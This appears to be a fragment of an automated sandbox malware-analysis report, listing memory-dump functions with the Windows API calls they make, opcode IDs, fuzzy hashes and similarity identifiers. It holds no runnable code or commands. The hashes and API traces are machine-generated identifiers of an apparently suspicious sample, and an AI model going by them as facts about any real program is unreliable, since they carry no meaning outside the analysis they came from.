                                                          • Instruction Fuzzy Hash: 01115A30D052588FDB15CFA5C418BEDBBF1EB4E305F189469D419B3290C7B48A84CB68
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetCurrentProcess.KERNEL32 ref: 014D6C10
                                                          • GetCurrentThread.KERNEL32 ref: 014D6C4D
                                                          • GetCurrentProcess.KERNEL32 ref: 014D6C8A
                                                          • GetCurrentThreadId.KERNEL32 ref: 014D6CE3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.678937554.00000000014D0000.00000040.00000001.sdmp, Offset: 014D0000, based on PE: false
                                                          Similarity
                                                          • API ID: Current$ProcessThread
                                                          • String ID: Xd/#
                                                          • API String ID: 2063062207-3495482034
                                                          • Opcode ID: a8375c5b1b6601cfac7796e3fc37b9950e68958657fa8a1df98d9553d57e9dcf
                                                          • Instruction ID: b400e2b4ed96e745439a9ab234ca34b81672a86e7937cbd7260dbbfa4ea32c9f
                                                          • Opcode Fuzzy Hash: a8375c5b1b6601cfac7796e3fc37b9950e68958657fa8a1df98d9553d57e9dcf
                                                          • Instruction Fuzzy Hash: D95145B4D002498FDB24CFA9D588BDEBBF0EF48308F25856AE419A7360D7755844CF65
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetCurrentProcess.KERNEL32 ref: 014D6C10
                                                          • GetCurrentThread.KERNEL32 ref: 014D6C4D
                                                          • GetCurrentProcess.KERNEL32 ref: 014D6C8A
                                                          • GetCurrentThreadId.KERNEL32 ref: 014D6CE3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.678937554.00000000014D0000.00000040.00000001.sdmp, Offset: 014D0000, based on PE: false
                                                          Similarity
                                                          • API ID: Current$ProcessThread
                                                          • String ID: Xd/#
                                                          • API String ID: 2063062207-3495482034
                                                          • Opcode ID: dcc4194c00500744c0240b1cc9ffd2cb325b7a32346dbde0cee750c9ab0870c4
                                                          • Instruction ID: 6eeaacccb703766f086aef238ca56d9b2a819359f9cb78e62071f045ff1a6ed7
                                                          • Opcode Fuzzy Hash: dcc4194c00500744c0240b1cc9ffd2cb325b7a32346dbde0cee750c9ab0870c4
                                                          • Instruction Fuzzy Hash: 3F5134B4D002498FDB24CFA9D548BDEBBF0EF48318F25846AE419A7360D7756844CF65
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 014DDDAA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.678937554.00000000014D0000.00000040.00000001.sdmp, Offset: 014D0000, based on PE: false
                                                          Similarity
                                                          • API ID: CreateWindow
                                                          • String ID: Xd/#$Xd/#
                                                          • API String ID: 716092398-112386822
                                                          • Opcode ID: 2aa50915c321a7e1feca9c784a8983c316dc09731af2f3220cee32cae09e1812
                                                          • Instruction ID: 8a77076b6e01e38903c77c11bc4cf5949d2bd555a0bbe7919c8bad0400abd1de
                                                          • Opcode Fuzzy Hash: 2aa50915c321a7e1feca9c784a8983c316dc09731af2f3220cee32cae09e1812
                                                          • Instruction Fuzzy Hash: BF41A0B1D003099FDF14CF99D894ADEBBB5FF48314F24812AE819AB250D774A845CF90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 014DDDAA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.678937554.00000000014D0000.00000040.00000001.sdmp, Offset: 014D0000, based on PE: false
                                                          Similarity
                                                          • API ID: CreateWindow
                                                          • String ID: Xd/#$Xd/#
                                                          • API String ID: 716092398-112386822
                                                          • Opcode ID: 7493093e5091ec4b8b84624b52f9d4418b4fba1b833775ec54d04af9574ccb29
                                                          • Instruction ID: 2f2543100c34d73abd006e41ecaf1e58decf3fc0776254d9b2de4a0b4936899a
                                                          • Opcode Fuzzy Hash: 7493093e5091ec4b8b84624b52f9d4418b4fba1b833775ec54d04af9574ccb29
                                                          • Instruction Fuzzy Hash: 4841B0B1D002499FDF14CFA9D894ADEBBB1FF88310F24822AE419AB250D7749845CF90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • SetWindowLongW.USER32(?,FFFFFFF4,?), ref: 014DDF3D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.678937554.00000000014D0000.00000040.00000001.sdmp, Offset: 014D0000, based on PE: false
                                                          Similarity
                                                          • API ID: LongWindow
                                                          • String ID: Xd/#
                                                          • API String ID: 1378638983-3495482034
                                                          • Opcode ID: bf6b873cf6bc9c9f4c1ab5b5b403d20ac9063fb65f392c1e72c142d179b7a6ef
                                                          • Instruction ID: d0aef17b4aee8130560e6ee6ebc16cea2ed5c46b9f9d2311d6092c9393268208
                                                          • Opcode Fuzzy Hash: bf6b873cf6bc9c9f4c1ab5b5b403d20ac9063fb65f392c1e72c142d179b7a6ef
                                                          • Instruction Fuzzy Hash: EC21B0B18043498FCB10CFA8C499BDEBFF5EF09314F11845AD954A7342D774AA45CBA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 014D6E5F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.678937554.00000000014D0000.00000040.00000001.sdmp, Offset: 014D0000, based on PE: false
                                                          Similarity
                                                          • API ID: DuplicateHandle
                                                          • String ID: Xd/#
                                                          • API String ID: 3793708945-3495482034
                                                          • Opcode ID: 3faf334a37bb3c858dab648817ba814728495126d9c57d7883896f8f0b9a2d2b
                                                          • Instruction ID: 47d871519f410db9aca0f9722a3fda2efbb67cda99223712d69a9d923346d633
                                                          • Opcode Fuzzy Hash: 3faf334a37bb3c858dab648817ba814728495126d9c57d7883896f8f0b9a2d2b
                                                          • Instruction Fuzzy Hash: 1E21C2B5900248AFDB10CFA9D884ADEFBF8EB48324F15842AE915A3310D774A944CFA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 014D6E5F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.678937554.00000000014D0000.00000040.00000001.sdmp, Offset: 014D0000, based on PE: false
                                                          Similarity
                                                          • API ID: DuplicateHandle
                                                          • String ID: Xd/#
                                                          • API String ID: 3793708945-3495482034
                                                          • Opcode ID: 34dc4b7a82c6a2724bb216363b792359db0f7c52c5f0ce16bd162f16be5a7828
                                                          • Instruction ID: ffea4d7780941290bfe58de62c146c00b14a01f4ec3822052d7269544021a39d
                                                          • Opcode Fuzzy Hash: 34dc4b7a82c6a2724bb216363b792359db0f7c52c5f0ce16bd162f16be5a7828
                                                          • Instruction Fuzzy Hash: 7A21B0B5900248AFDB10CFA9D884AEEFBF5EB48324F15842AE955A3310D774A945CFA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,014DBEA9,00000800,00000000,00000000), ref: 014DC0BA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.678937554.00000000014D0000.00000040.00000001.sdmp, Offset: 014D0000, based on PE: false
                                                          Similarity
                                                          • API ID: LibraryLoad
                                                          • String ID: Xd/#
                                                          • API String ID: 1029625771-3495482034
                                                          • Opcode ID: f33e75b87eeb233a166901df8f28abb7421f06e09136c39a57952a8d410f9ad6
                                                          • Instruction ID: 6f0a988a89fbd93f7df4ec4f931141c26aa0e12d208cb177d77b1a66ee4c72df
                                                          • Opcode Fuzzy Hash: f33e75b87eeb233a166901df8f28abb7421f06e09136c39a57952a8d410f9ad6
                                                          • Instruction Fuzzy Hash: C111F2B69042089FDB20CF9AD484B9EFBF4EB49224F04852ED519A7710C3B5A945CFA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,014DBEA9,00000800,00000000,00000000), ref: 014DC0BA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.678937554.00000000014D0000.00000040.00000001.sdmp, Offset: 014D0000, based on PE: false
                                                          Similarity
                                                          • API ID: LibraryLoad
                                                          • String ID: Xd/#
                                                          • API String ID: 1029625771-3495482034
                                                          • Opcode ID: 0610faaa438aa85ca0cab523385925150e94031803a242c3ff5b9f03b6588acb
                                                          • Instruction ID: 200b102a18a236a99e46ee497b43afa5b782d25b8f73015f61118e834c846eef
                                                          • Opcode Fuzzy Hash: 0610faaa438aa85ca0cab523385925150e94031803a242c3ff5b9f03b6588acb
                                                          • Instruction Fuzzy Hash: 051122B68002488FCB20CFAAD484BEEFBF4EB89324F04852ED519A7210C375A545CFA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • SetWindowLongW.USER32(?,FFFFFFF4,?), ref: 014DDF3D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.678937554.00000000014D0000.00000040.00000001.sdmp, Offset: 014D0000, based on PE: false
                                                          Similarity
                                                          • API ID: LongWindow
                                                          • String ID: Xd/#
                                                          • API String ID: 1378638983-3495482034
                                                          • Opcode ID: 4a597d52d663940246965bce52683ac4d79c52fb6e8f88b34e4d29d8db66d52c
                                                          • Instruction ID: 9e4744ba111c427449f59cbaf9b7590177b1e2ead48afd4c6add6f128712441b
                                                          • Opcode Fuzzy Hash: 4a597d52d663940246965bce52683ac4d79c52fb6e8f88b34e4d29d8db66d52c
                                                          • Instruction Fuzzy Hash: DA11E3B58046089FDB20DF99D488BDEBBF8EB48324F10845AE915A7340C374A944CFA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 014DBE2E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.678937554.00000000014D0000.00000040.00000001.sdmp, Offset: 014D0000, based on PE: false
                                                          Similarity
                                                          • API ID: HandleModule
                                                          • String ID: Xd/#
                                                          • API String ID: 4139908857-3495482034
                                                          • Opcode ID: 1348620e116537670375ff6eb0f601d1c425fbd94dadae3591995149ea00f869
                                                          • Instruction ID: 850aa37e942059dd0b49f09a6b60f66f7cd88bc16b9ea4487596066570332a49
                                                          • Opcode Fuzzy Hash: 1348620e116537670375ff6eb0f601d1c425fbd94dadae3591995149ea00f869
                                                          • Instruction Fuzzy Hash: 26110FB5C002498FDB20CF9AD844BDFFBF4EB89224F15852AD929A7310C374A545CFA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 014DBE2E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.678937554.00000000014D0000.00000040.00000001.sdmp, Offset: 014D0000, based on PE: false
                                                          Similarity
                                                          • API ID: HandleModule
                                                          • String ID: Xd/#
                                                          • API String ID: 4139908857-3495482034
                                                          • Opcode ID: e6c4d5d7b4b247c44127282a948dcc45a1c691bd46e103bd2b04073b6f05277f
                                                          • Instruction ID: 6a3f65553e384f56c180c91ac47eac8a22d71591467b263c8e16c87bdf9834cf
                                                          • Opcode Fuzzy Hash: e6c4d5d7b4b247c44127282a948dcc45a1c691bd46e103bd2b04073b6f05277f
                                                          • Instruction Fuzzy Hash: 83111CB58002488EDB20CF9AD844B8EFBF0EF89224F15842AC829A7210C374A545CFA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • SetWindowLongW.USER32(?,FFFFFFF4,?), ref: 014DDF3D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.678937554.00000000014D0000.00000040.00000001.sdmp, Offset: 014D0000, based on PE: false
                                                          Similarity
                                                          • API ID: LongWindow
                                                          • String ID: Xd/#
                                                          • API String ID: 1378638983-3495482034
                                                          • Opcode ID: 712e9b1132add40c236f1d69a211cb33ae1cb170d92d43e5613dd5bee580fa95
                                                          • Instruction ID: 1e7a9e289ef2aaf9be50b32a5b29b8ef1f164cac1e5b12c9245d6536cce3f0b7
                                                          • Opcode Fuzzy Hash: 712e9b1132add40c236f1d69a211cb33ae1cb170d92d43e5613dd5bee580fa95
                                                          • Instruction Fuzzy Hash: 0211F2B58002088FDB20DF99D588BDEBBF4EB48324F14845AE919B7340C374A944CFA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.679196403.0000000002C30000.00000040.00000001.sdmp, Offset: 02C30000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1de72720c821fb2dad6fb0f2eb6f5811b0e56833d912af0f86f8f1cdccb289ad
                                                          • Instruction ID: a9e61d08900d081e9587dcd72119b341b91f5b016608a50ec8bdf657f3a5df4d
                                                          • Opcode Fuzzy Hash: 1de72720c821fb2dad6fb0f2eb6f5811b0e56833d912af0f86f8f1cdccb289ad
                                                          • Instruction Fuzzy Hash: 2331C072B00A118BCB2AEB34C4607AE77A2AFC5308B14887DD4098F796DF34DD05CB80
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.679196403.0000000002C30000.00000040.00000001.sdmp, Offset: 02C30000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3af18db7bba6d2305b9552d9b5a77caf36f145ee77a5cb26734e93849f8dff89
                                                          • Instruction ID: 09a859073a9935ed8745ac140d5408349bea9eef6565ef0135401ab780f0876f
                                                          • Opcode Fuzzy Hash: 3af18db7bba6d2305b9552d9b5a77caf36f145ee77a5cb26734e93849f8dff89
                                                          • Instruction Fuzzy Hash: 0F3171727006118BCB2AEB39C4A07AE77A2AFC5708B14887CD40A8F796DF74DD05CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.678797367.00000000011BD000.00000040.00000001.sdmp, Offset: 011BD000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4c1f047402f7aebee7943d4252713be6ed027065c089b7060a7363a163737743
                                                          • Instruction ID: a0c359c2f0c24e1e42b307708fc7b7184879be919f8f691f4297d08f7ce46eb9
                                                          • Opcode Fuzzy Hash: 4c1f047402f7aebee7943d4252713be6ed027065c089b7060a7363a163737743
                                                          • Instruction Fuzzy Hash: CC2128B1504200DFDF1DCF94E9C0BA6BBB5FB8832CF248569E9054B216C336D845CBA2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.678811569.00000000011CD000.00000040.00000001.sdmp, Offset: 011CD000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8f3dc7a54f613277d54b7c86bf0bc33380466d95245b04bf88d76d70c4505602
                                                          • Instruction ID: 28fa2eef9f21e9a9a5cd74b2cec5baff6cb7d65b53a0c7f138eff1a0c8e3cba9
                                                          • Opcode Fuzzy Hash: 8f3dc7a54f613277d54b7c86bf0bc33380466d95245b04bf88d76d70c4505602
                                                          • Instruction Fuzzy Hash: 7D2125B5508240DFCF19CF58E8C0B26BBA5FB84754F24C57DD9094B246C376D817CAA2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.678811569.00000000011CD000.00000040.00000001.sdmp, Offset: 011CD000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d40aa179074befca6c8e3bb664113825aa4c77bd0c6c82c93aa71e16c92180ec
                                                          • Instruction ID: c3645eb03bbb0a4ca88422dd1e8598437861d248a548de18cc52a11c54d4552e
                                                          • Opcode Fuzzy Hash: d40aa179074befca6c8e3bb664113825aa4c77bd0c6c82c93aa71e16c92180ec
                                                          • Instruction Fuzzy Hash: B22192754083809FCB17CF18E994B15BF71EB46214F28C5EAD8458B657C33A9856CBA2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.678797367.00000000011BD000.00000040.00000001.sdmp, Offset: 011BD000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 76d66a488a8e2eb4ea502f692b6080f8959fcb036056923dacca0f9efaf34805
                                                          • Instruction ID: 66d36d7049697155e8b142044788402555cedfe1b3ed92858f66daf282cc2c87
                                                          • Opcode Fuzzy Hash: 76d66a488a8e2eb4ea502f692b6080f8959fcb036056923dacca0f9efaf34805
                                                          • Instruction Fuzzy Hash: 8111D376404280CFCF1ACF54E9C4B56BF71FB84328F2486A9D8054B617C33AD456CBA2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.678797367.00000000011BD000.00000040.00000001.sdmp, Offset: 011BD000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f5c562fa37e0a9869d8135a779e5d51487e1b5aa3b598d5b217bafabe88c2d0c
                                                          • Instruction ID: f2893484c880b5f4574af9717169000798e566631651ba29bbfaa348112bb411
                                                          • Opcode Fuzzy Hash: f5c562fa37e0a9869d8135a779e5d51487e1b5aa3b598d5b217bafabe88c2d0c
                                                          • Instruction Fuzzy Hash: 0801A0714087C49EDB2C5A55DCC4BD6FBD8DF4122CF098555EE045A146C3759844C6B1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.678797367.00000000011BD000.00000040.00000001.sdmp, Offset: 011BD000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7f769f558713979a63e89a15246cfde2accc26b43cc53f47d57a285ef15411e4
                                                          • Instruction ID: 20429edcc7dd501ae2a02872123547cecaca28873e9b8a3ac4130b29eab61ddc
                                                          • Opcode Fuzzy Hash: 7f769f558713979a63e89a15246cfde2accc26b43cc53f47d57a285ef15411e4
                                                          • Instruction Fuzzy Hash: 98F096714047C49EEB259A1ADCC4BA2FFA8EF41738F18C55AED085B287C3799C44CAB1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.679196403.0000000002C30000.00000040.00000001.sdmp, Offset: 02C30000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f2b341206fcc40c75831ff312a210f9857162068ae1c01d2459e17bef1672391
                                                          • Instruction ID: 7049c6f9341f02c0a6c8863669f9674b741913ce5da14e97cd368a1b39312998
                                                          • Opcode Fuzzy Hash: f2b341206fcc40c75831ff312a210f9857162068ae1c01d2459e17bef1672391
                                                          • Instruction Fuzzy Hash: 77F0DAB0D0420A9FDB44DFA9D845ABEBFF4BF48304F5449A9D51CE7640D77096008B91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.679196403.0000000002C30000.00000040.00000001.sdmp, Offset: 02C30000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: be5989ec77e31fbc236f6fdd2f49afccc56c43516e010588a123712ea483cf14
                                                          • Instruction ID: 0a819302aa8989e6f741adef787d41780ea6413d471b85002790de2b76f03bbd
                                                          • Opcode Fuzzy Hash: be5989ec77e31fbc236f6fdd2f49afccc56c43516e010588a123712ea483cf14
                                                          • Instruction Fuzzy Hash: 49F0B2B0D0030A9FDB44DFA9C846AAEBBF4AF48600F544969E518E7240D7B096008B90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.679196403.0000000002C30000.00000040.00000001.sdmp, Offset: 02C30000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 27ad28669694f48247887bc31544073ac485fb28870ede0f4652b7a006f64101
                                                          • Instruction ID: 643032d1d48a79089981c6e431ef5e9672740a9f55dc9aef5b173b62f2c5ce19
                                                          • Opcode Fuzzy Hash: 27ad28669694f48247887bc31544073ac485fb28870ede0f4652b7a006f64101
                                                          • Instruction Fuzzy Hash: 4BE0926188D296CFD7124BA49C64AA97FB0EB0B304F4C899AC142F71A2C2E84545DB61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.679196403.0000000002C30000.00000040.00000001.sdmp, Offset: 02C30000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 19690e8724d17bb36a9a447506068614e8009f72eb8231a4a8a2825d78f0fcf3
                                                          • Instruction ID: b3c895b4ece7e06b6bc86d32d52f49016ae65d4839ebfa7dbd496888bd25799a
                                                          • Opcode Fuzzy Hash: 19690e8724d17bb36a9a447506068614e8009f72eb8231a4a8a2825d78f0fcf3
                                                          • Instruction Fuzzy Hash: EEE0C2B4E5020A9FD740EFB9C50565ABBF0BB08200F1489A9D829E7211E7B48A05CF81
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.679196403.0000000002C30000.00000040.00000001.sdmp, Offset: 02C30000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3203feaf6a80a461d2ac695e31cdbf9279f014739204c9406827fb0c26166aeb
                                                          • Instruction ID: a5cbbddcf3dd4465ffa53ec5251afb1442f234f3426e134140da64686db4eb0d
                                                          • Opcode Fuzzy Hash: 3203feaf6a80a461d2ac695e31cdbf9279f014739204c9406827fb0c26166aeb
                                                          • Instruction Fuzzy Hash: 23E046B5C053099FDB80EFA8860635EBFF0AB04200F00892AD805E3600E7B846048F81
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.679196403.0000000002C30000.00000040.00000001.sdmp, Offset: 02C30000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 44cd51e07f3ded072dd4d31aff27d9a00e9bb92e6faf67d7201c75ebed1123f8
                                                          • Instruction ID: dd7c2391510cf744173da4f1f6cccc200ca07638cb00bf2a7d00d80e4af09fd7
                                                          • Opcode Fuzzy Hash: 44cd51e07f3ded072dd4d31aff27d9a00e9bb92e6faf67d7201c75ebed1123f8
                                                          • Instruction Fuzzy Hash: 1CE0B6B0D40209DFD740EFBAC905A5EBBF4BF08700F1589A9D419E7211E7B596058F91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.679196403.0000000002C30000.00000040.00000001.sdmp, Offset: 02C30000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 296dddfe05ee0977d8d68745f0baa036127653040f647a4617b8b62353229d25
                                                          • Instruction ID: dd3da1d0e9e938ff67a1b25baadfb9e7151402780bb19ac5bdc5cccfa0dc8171
                                                          • Opcode Fuzzy Hash: 296dddfe05ee0977d8d68745f0baa036127653040f647a4617b8b62353229d25
                                                          • Instruction Fuzzy Hash: E1D017B1C0430EAFDB80EFB9890579EBFF4AB04200F10496AC019E7201E7B84604CF92
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.679196403.0000000002C30000.00000040.00000001.sdmp, Offset: 02C30000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ccdd22a9f5de1babcc601b8bdf5c81f8668832a1f35c540a96a162f6a28bca5b
                                                          • Instruction ID: 39693bcb4d52f1cc9a2ec3bb71a7182f19f6084f5c4296509f8a32bcbcc43b3a
                                                          • Opcode Fuzzy Hash: ccdd22a9f5de1babcc601b8bdf5c81f8668832a1f35c540a96a162f6a28bca5b
                                                          • Instruction Fuzzy Hash: 0ED012331441089F8B41EA95E840D5677DDBB587107048822E508C7820E721E574EB51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Non-executed Functions

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.678937554.00000000014D0000.00000040.00000001.sdmp, Offset: 014D0000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 21edf0e08268a85d24118f4cca8764b20649e2a04b1452978122ec49ff505fd5
                                                          • Instruction ID: 1159bfd1c35344a25353d902e5d9cd4537f7940203f847e0654efc4ffef83e57
                                                          • Opcode Fuzzy Hash: 21edf0e08268a85d24118f4cca8764b20649e2a04b1452978122ec49ff505fd5
                                                          • Instruction Fuzzy Hash: 79527CB1982B268FD720CF14E4E85D93BB1FB40398FD14A19D2619F6E0E3B4656ACF44
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.678937554.00000000014D0000.00000040.00000001.sdmp, Offset: 014D0000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0364d0cb0d92962310631b22c6832a9b49dc391245120867b91922f680614544
                                                          • Instruction ID: 7972d0cda2a0d2e0d16fa5828ad54289fc240a11979243b9cb2393f3ef570f8d
                                                          • Opcode Fuzzy Hash: 0364d0cb0d92962310631b22c6832a9b49dc391245120867b91922f680614544
                                                          • Instruction Fuzzy Hash: 11A17032E0061A8FCF05DFA5C8545DEBBB2FF85304B16856AE905BB361EB31E916CB40
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.682125335.00000000052B0000.00000040.00000001.sdmp, Offset: 052B0000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e59787f7a14dd20777f7de562925e87349a8b39a3fa5706672f6424688a4725d
                                                          • Instruction ID: 3460e8c58dd7eaaae2dba974284d127b6ad63cbaf4e93185ee36c6aa0e8229ac
                                                          • Opcode Fuzzy Hash: e59787f7a14dd20777f7de562925e87349a8b39a3fa5706672f6424688a4725d
                                                          • Instruction Fuzzy Hash: 42A1E475E142188FDB18CFAAC984BEEBBB2BF89300F14C069D509B7254DB715A85CF51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.682125335.00000000052B0000.00000040.00000001.sdmp, Offset: 052B0000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5ec2df4d64d975c1bd2fa86f0693bb4b6fff99a3f3309edb83a102a6dcc5b118
                                                          • Instruction ID: 94bdac4e5d652d45bd53151415650bdff2f90ef66c805442af848da1f46cc480
                                                          • Opcode Fuzzy Hash: 5ec2df4d64d975c1bd2fa86f0693bb4b6fff99a3f3309edb83a102a6dcc5b118
                                                          • Instruction Fuzzy Hash: 5081F371E102189FEB18CFA6C9947EDBBB2FF89300F14C0AAD509AB254DB711A85CF50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetSystemMetrics.USER32(00000005), ref: 052BA436
                                                          • GetSystemMetrics.USER32(00000006), ref: 052BA470
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.682125335.00000000052B0000.00000040.00000001.sdmp, Offset: 052B0000, based on PE: false
                                                          Similarity
                                                          • API ID: MetricsSystem
                                                          • String ID: Xd/#
                                                          • API String ID: 4116985748-3495482034
                                                          • Opcode ID: a6381a9d73f674a202d983d194a36a3260bca9215edb68008f67e7390e749d2e
                                                          • Instruction ID: 048f14af1a9ed38e1d3f5c8b829c07c5c2e225f930aacf266f11b3c42fc712bb
                                                          • Opcode Fuzzy Hash: a6381a9d73f674a202d983d194a36a3260bca9215edb68008f67e7390e749d2e
                                                          • Instruction Fuzzy Hash: 0A2155B08043898FDB20CF99D4487EEBFF0AF49354F1484AAD45AA7751D3B95588CFA2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetSystemMetrics.USER32(00000005), ref: 052BA436
                                                          • GetSystemMetrics.USER32(00000006), ref: 052BA470
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.682125335.00000000052B0000.00000040.00000001.sdmp, Offset: 052B0000, based on PE: false
                                                          Similarity
                                                          • API ID: MetricsSystem
                                                          • String ID: Xd/#
                                                          • API String ID: 4116985748-3495482034
                                                          • Opcode ID: 5aa9eae86a5711ae92de0e503fea02d59bc537187a57989d1c30038a17b35120
                                                          • Instruction ID: 44f834f76596e616eca83e7cf5242bb1a83caa73d18a4c6c829f36595b6b9fbe
                                                          • Opcode Fuzzy Hash: 5aa9eae86a5711ae92de0e503fea02d59bc537187a57989d1c30038a17b35120
                                                          • Instruction Fuzzy Hash: 5F2112B09043498FDB20CF99D4487EEBFF4EB08354F148469D41AA7740D3B56588CFA2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Executed Functions

